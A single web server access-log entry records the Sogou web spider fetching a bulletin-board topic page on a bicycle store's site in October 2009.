220.181.94.230 - - [10/Oct/2009:06:38:58 -0700] "GET /bullitinboard/viewtopic.php?p=15546 HTTP/1.1" 200 533 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "bicyclestoreshouston.com"
